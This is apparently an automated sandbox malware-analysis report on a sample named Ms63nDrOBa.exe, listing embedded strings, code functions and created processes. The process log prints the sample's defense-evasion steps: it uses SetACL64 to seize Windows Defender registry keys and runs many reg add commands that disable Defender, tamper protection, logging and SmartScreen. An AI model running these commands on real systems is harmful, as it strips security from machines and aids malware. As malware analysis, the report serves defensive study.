Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: Ms63nDrOBa.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0O |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0 |
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com |
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com. |
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe |
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174C28F | 4_2_00007FF7C174C28F |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C173E4B0 | 4_2_00007FF7C173E4B0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C17494BC | 4_2_00007FF7C17494BC |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1753410 | 4_2_00007FF7C1753410 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C17013F0 | 4_2_00007FF7C17013F0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C172A350 | 4_2_00007FF7C172A350 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C172BC40 | 4_2_00007FF7C172BC40 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1736B2A | 4_2_00007FF7C1736B2A |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1754218 | 4_2_00007FF7C1754218 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C173C250 | 4_2_00007FF7C173C250 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C17163E0 | 4_2_00007FF7C17163E0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175A31C | 4_2_00007FF7C175A31C |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1738360 | 4_2_00007FF7C1738360 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174F394 | 4_2_00007FF7C174F394 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175669C | 4_2_00007FF7C175669C |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C173A630 | 4_2_00007FF7C173A630 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C170F650 | 4_2_00007FF7C170F650 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C172E530 | 4_2_00007FF7C172E530 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1717580 | 4_2_00007FF7C1717580 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1759718 | 4_2_00007FF7C1759718 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175B74C | 4_2_00007FF7C175B74C |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175C76C | 4_2_00007FF7C175C76C |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1701A30 | 4_2_00007FF7C1701A30 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174FB00 | 4_2_00007FF7C174FB00 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1727B10 | 4_2_00007FF7C1727B10 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C173F9C0 | 4_2_00007FF7C173F9C0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C170E9D0 | 4_2_00007FF7C170E9D0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174EA10 | 4_2_00007FF7C174EA10 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C1763C64 | 4_2_00007FF7C1763C64 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C170CB20 | 4_2_00007FF7C170CB20 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174BFE8 | 4_2_00007FF7C174BFE8 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175DFF0 | 4_2_00007FF7C175DFF0 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C174EF30 | 4_2_00007FF7C174EF30 |
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | Code function: 4_2_00007FF7C175EF6C | 4_2_00007FF7C175EF6C |
Source: unknown | Process created: C:\Users\user\Desktop\Ms63nDrOBa.exe "C:\Users\user\Desktop\Ms63nDrOBa.exe" | |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat | Jump to behavior |
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
